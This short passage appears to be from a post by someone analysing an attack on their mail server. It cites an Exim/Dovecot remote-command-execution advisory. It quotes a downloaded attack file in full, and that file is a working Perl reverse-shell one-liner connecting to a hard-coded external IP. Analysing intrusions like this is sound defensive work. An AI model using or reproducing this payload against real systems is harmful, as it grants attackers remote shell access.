(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'not sure which MTA is vulnerable, yet.
...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
